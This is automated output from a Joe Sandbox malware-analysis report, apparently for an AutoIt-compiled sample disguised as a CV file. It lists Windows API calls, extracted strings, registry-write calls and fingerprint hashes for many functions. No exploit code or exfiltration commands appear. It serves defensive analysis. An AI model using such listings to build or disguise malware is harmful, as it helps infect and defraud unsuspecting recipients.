                                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                            • String ID: 0
                                                                                            • API String ID: 464785882-4108050209
                                                                                            • Opcode ID: 462fbfa25034e2c1c8bde566f483654848d297c25a79457bee050eeb1324c2c0
                                                                                            • Instruction ID: 89c2173f00f274fa8bc473172534c83dfed1bc5323b77bf4fc7d7130f7079ad1
                                                                                            • Opcode Fuzzy Hash: 462fbfa25034e2c1c8bde566f483654848d297c25a79457bee050eeb1324c2c0
                                                                                            • Instruction Fuzzy Hash: 5D129C74204241DFDB21CF24E895BA9BBF5BF05304F15456AF989CB662C731EC85CBA1
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0010DBD6
                                                                                            • GetDriveTypeW.KERNEL32(?,0015DC54,?,\\.\,0015DC00), ref: 0010DCC3
                                                                                            • SetErrorMode.KERNEL32(00000000,0015DC54,?,\\.\,0015DC00), ref: 0010DE29
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$DriveType
                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                            • API String ID: 2907320926-4222207086
                                                                                            • Opcode ID: 8c086cc015c72459ffa21ea444a7a2448bdb6acc8f14840d718e4fab180645a7
                                                                                            • Instruction ID: 18a0ceee22d90a8e403b3ecae9b066da559ce80904da31469ad01d49f43017f9
                                                                                            • Opcode Fuzzy Hash: 8c086cc015c72459ffa21ea444a7a2448bdb6acc8f14840d718e4fab180645a7
                                                                                            • Instruction Fuzzy Hash: DC51A330248302EBC614DFA0E981D69B7B0FB95701B25895EF4EF9B2D2DBE0D945E742
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wcsnicmp
                                                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                            • API String ID: 1038674560-86951937
                                                                                            • Opcode ID: c8b7295df229cdbd21f66e92e46b7e129c9aa75458ad2ce3846e3909cd7b59ea
                                                                                            • Instruction ID: 7b52527495a38c6bc9089c5e27a936cd16d3b902aac3a1600ea328cf42070192
                                                                                            • Opcode Fuzzy Hash: c8b7295df229cdbd21f66e92e46b7e129c9aa75458ad2ce3846e3909cd7b59ea
                                                                                            • Instruction Fuzzy Hash: B881C330640215AAEB25BBA4DD93FFE37A9AF14700F04402DF90AAA1C3EB70D945D7A1
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0012C788
                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0012C83E
                                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0012C859
                                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0012CB15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window
                                                                                            • String ID: 0
                                                                                            • API String ID: 2326795674-4108050209
                                                                                            • Opcode ID: e2bf6108a8ff6cf823eca5616e988a88c507029ad63c2766e5721c2bbe320c75
                                                                                            • Instruction ID: 691619b337c0c5d8343b4a3ab902c7d4559628dd74322dd9b53a3f1ae01a1ae9
                                                                                            • Opcode Fuzzy Hash: e2bf6108a8ff6cf823eca5616e988a88c507029ad63c2766e5721c2bbe320c75
                                                                                            • Instruction Fuzzy Hash: 8BF1E171204321AFD7258F24EC85BAEBBE4FF49354F080629F688962A1D775C9A1CBD1
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?,0015DC00), ref: 00126449
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharUpper
                                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                            • API String ID: 3964851224-45149045
                                                                                            • Opcode ID: 78cc046f14a44d0ea6c61f4bc62911b524948bc275c5f0ea2db4d8090c20f104
                                                                                            • Instruction ID: 6207b6eacd08d7133934cfc42395551f203b1922006d77ae694ac920df2683c6
                                                                                            • Opcode Fuzzy Hash: 78cc046f14a44d0ea6c61f4bc62911b524948bc275c5f0ea2db4d8090c20f104
                                                                                            • Instruction Fuzzy Hash: FCC160302043558BCB08FF10E551AAE77A5AF94344F14485DF98A6B3E3DB20ED5BCB96
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000012), ref: 0012D5AE
                                                                                            • SetTextColor.GDI32(?,?), ref: 0012D5B2
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0012D5C8
                                                                                            • GetSysColor.USER32(0000000F), ref: 0012D5D3
                                                                                            • CreateSolidBrush.GDI32(?), ref: 0012D5D8
                                                                                            • GetSysColor.USER32(00000011), ref: 0012D5F0
                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0012D5FE
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0012D60F
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0012D618
                                                                                            • SelectObject.GDI32(?,?), ref: 0012D625
                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0012D644
                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0012D65B
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0012D670
                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0012D698
                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0012D6BF
                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0012D6DD
                                                                                            • DrawFocusRect.USER32(?,?), ref: 0012D6E8
                                                                                            • GetSysColor.USER32(00000011), ref: 0012D6F6
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0012D6FE
                                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0012D712
                                                                                            • SelectObject.GDI32(?,0012D2A5), ref: 0012D729
                                                                                            • DeleteObject.GDI32(?), ref: 0012D734
                                                                                            • SelectObject.GDI32(?,?), ref: 0012D73A
                                                                                            • DeleteObject.GDI32(?), ref: 0012D73F
                                                                                            • SetTextColor.GDI32(?,?), ref: 0012D745
                                                                                            • SetBkColor.GDI32(?,?), ref: 0012D74F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                            • String ID:
                                                                                            • API String ID: 1996641542-0
                                                                                            • Opcode ID: ed152257914b1838fbd46d5cc132e99d4350b6f21130312a65e08eca77a115a9
                                                                                            • Instruction ID: bb71524141f3592cd5a5f397a2cc3936bd504097be7534315ec754dbd4908b00
                                                                                            • Opcode Fuzzy Hash: ed152257914b1838fbd46d5cc132e99d4350b6f21130312a65e08eca77a115a9
                                                                                            • Instruction Fuzzy Hash: 85515B75900218BFDF119FA8EC48EAE7B79FF09724F214115FA15AB2A1D7719A80CF50
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0012B7B0
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0012B7C1
                                                                                            • CharNextW.USER32(0000014E), ref: 0012B7F0
                                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0012B831
                                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0012B847
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0012B858
                                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0012B875
                                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 0012B8C7
                                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0012B8DD
                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0012B90E
                                                                                            • _memset.LIBCMT ref: 0012B933
                                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0012B97C
                                                                                            • _memset.LIBCMT ref: 0012B9DB
                                                                                            • SendMessageW.USER32 ref: 0012BA05
                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0012BA5D
                                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 0012BB0A
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0012BB2C
                                                                                            • GetMenuItemInfoW.USER32(?), ref: 0012BB76
                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0012BBA3
                                                                                            • DrawMenuBar.USER32(?), ref: 0012BBB2
                                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 0012BBDA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                            • String ID: 0
                                                                                            • API String ID: 1073566785-4108050209
                                                                                            • Opcode ID: 301d08d645e1431e0535c76e5cdc772a7bf56e251b1115c9226b94f0abb300f4
                                                                                            • Instruction ID: 09c47416b13c44d4ea6e2e4c761a4c042750be09c28f654224a13b4a68925fdf
                                                                                            • Opcode Fuzzy Hash: 301d08d645e1431e0535c76e5cdc772a7bf56e251b1115c9226b94f0abb300f4
                                                                                            • Instruction Fuzzy Hash: 68E18C75904228AFDF209FA1ECC4AEE7B78FF05714F148156F919AA291DB708A91CF60
                                                                                            APIs
                                                                                            • GetCursorPos.USER32(?), ref: 0012778A
                                                                                            • GetDesktopWindow.USER32 ref: 0012779F
                                                                                            • GetWindowRect.USER32(00000000), ref: 001277A6
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00127808
                                                                                            • DestroyWindow.USER32(?), ref: 00127834
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0012785D
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0012787B
                                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001278A1
                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 001278B6
                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001278C9
                                                                                            • IsWindowVisible.USER32(?), ref: 001278E9
                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00127904
                                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00127918
                                                                                            • GetWindowRect.USER32(?,?), ref: 00127930
                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00127956
                                                                                            • GetMonitorInfoW.USER32 ref: 00127970
                                                                                            • CopyRect.USER32(?,?), ref: 00127987
                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 001279F2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                            • String ID: ($0$tooltips_class32
                                                                                            • API String ID: 698492251-4156429822
                                                                                            • Opcode ID: 28068922c31f6147ca16680cd6de452a8bec57c265b67367ad7f158538984bc7
                                                                                            • Instruction ID: 4cd1905b6125e0c884dd414a9a563e23f01fc93e95d9138dc15d1ce2677458d9
                                                                                            • Opcode Fuzzy Hash: 28068922c31f6147ca16680cd6de452a8bec57c265b67367ad7f158538984bc7
                                                                                            • Instruction Fuzzy Hash: 73B18B71608311AFDB04DF64D848B6BBBE4FF89310F00891DF5999B2A2DB70E854CB92
                                                                                            APIs
                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00106CFB
                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00106D21
                                                                                            • _wcscpy.LIBCMT ref: 00106D4F
                                                                                            • _wcscmp.LIBCMT ref: 00106D5A
                                                                                            • _wcscat.LIBCMT ref: 00106D70
                                                                                            • _wcsstr.LIBCMT ref: 00106D7B
                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00106D97
                                                                                            • _wcscat.LIBCMT ref: 00106DE0
                                                                                            • _wcscat.LIBCMT ref: 00106DE7
                                                                                            • _wcsncpy.LIBCMT ref: 00106E12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                            • API String ID: 699586101-1459072770
                                                                                            • Opcode ID: a7e8b522922328d5904e79541a63af8f3557b6d1c1a6b49cd0e32a1e9c97e5da
                                                                                            • Instruction ID: cea16a4d5d630b93cc11a385aff1c9e29f587b1c9a6b2001b5cf922c47847439
                                                                                            • Opcode Fuzzy Hash: a7e8b522922328d5904e79541a63af8f3557b6d1c1a6b49cd0e32a1e9c97e5da
                                                                                            • Instruction Fuzzy Hash: CF41F272A00241BFEB10AB65DC47EFF77BCEF41310F14406AF945A6283EBB49A1097A1
                                                                                            APIs
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000DA939
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 000DA941
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000DA96C
                                                                                            • GetSystemMetrics.USER32(00000008), ref: 000DA974
                                                                                            • GetSystemMetrics.USER32(00000004), ref: 000DA999
                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000DA9B6
                                                                                            • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 000DA9C6
                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000DA9F9
                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000DAA0D
                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 000DAA2B
                                                                                            • GetStockObject.GDI32(00000011), ref: 000DAA47
                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 000DAA52
                                                                                              • Part of subcall function 000DB63C: GetCursorPos.USER32(000000FF), ref: 000DB64F
                                                                                              • Part of subcall function 000DB63C: ScreenToClient.USER32(00000000,000000FF), ref: 000DB66C
                                                                                              • Part of subcall function 000DB63C: GetAsyncKeyState.USER32(00000001), ref: 000DB691
                                                                                              • Part of subcall function 000DB63C: GetAsyncKeyState.USER32(00000002), ref: 000DB69F
                                                                                            • SetTimer.USER32(00000000,00000000,00000028,000DAB87), ref: 000DAA79
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                            • String ID: AutoIt v3 GUI
                                                                                            • API String ID: 1458621304-248962490
                                                                                            • Opcode ID: c9de7c68086bf03b6311ff9905d5fbf726a65a226f22beae21331ceb3d38dab8
                                                                                            • Instruction ID: f4cd269d7315c2f88490f2bab37530f1aafc8f18491869e70f2748e6bbe7bc08
                                                                                            • Opcode Fuzzy Hash: c9de7c68086bf03b6311ff9905d5fbf726a65a226f22beae21331ceb3d38dab8
                                                                                            • Instruction Fuzzy Hash: F6B1907560020AAFDF14DFA8ED45BED7BB4FB09314F11421AFA05A72A0DB74D981CB61
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Foreground
                                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                            • API String ID: 62970417-1919597938
                                                                                            • Opcode ID: 79fe539589506104c0fd63976e0fdfc23dd0eb305a0cf451f689cfa6ea3744c9
                                                                                            • Instruction ID: 63ea8a87590027428cb82d1a5ea17536ce2b261deee07c8b1a61f6c9647dc96c
                                                                                            • Opcode Fuzzy Hash: 79fe539589506104c0fd63976e0fdfc23dd0eb305a0cf451f689cfa6ea3744c9
                                                                                            • Instruction Fuzzy Hash: 75D19430108346DBCB18FF50C981AEEBBB1BF54344F104A2DF55A675A2DB30E99ADB91
                                                                                            APIs
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00123735
                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0015DC00,00000000,?,00000000,?,?), ref: 001237A3
                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001237EB
                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00123874
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00123B94
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00123BA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                            • API String ID: 536824911-966354055
                                                                                            • Opcode ID: a8aaf9bad9f47750b1982e9bc43119b4bfa4fa1ae89577fb156e12a7b470cc05
                                                                                            • Instruction ID: 2e220820562d335b6c376864f8464cce1fbd05766738ac6966c29f4d68af14f2
                                                                                            • Opcode Fuzzy Hash: a8aaf9bad9f47750b1982e9bc43119b4bfa4fa1ae89577fb156e12a7b470cc05
                                                                                            • Instruction Fuzzy Hash: C8025675200611AFCB14EF24D845E6EB7E5FF89720F04845DF99A9B2A2CB34EE51CB81
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00126C56
                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00126D16
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharMessageSendUpper
                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                            • API String ID: 3974292440-719923060
                                                                                            • Opcode ID: 5d7f34724f6433bf305facbf23675f49cbdea77cca07f62506ffed5f88a28f58
                                                                                            • Instruction ID: 373357def5046558887f688032f5a05e52eaaa00788fd11d68cb1a18bcba1ae4
                                                                                            • Opcode Fuzzy Hash: 5d7f34724f6433bf305facbf23675f49cbdea77cca07f62506ffed5f88a28f58
                                                                                            • Instruction Fuzzy Hash: 37A19C302143559BCB18EF20D951EAEB3A1BF94314F11496DB99A6B3D3DB30EC16CB91
                                                                                            APIs
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 000FCF91
                                                                                            • __swprintf.LIBCMT ref: 000FD032
                                                                                            • _wcscmp.LIBCMT ref: 000FD045
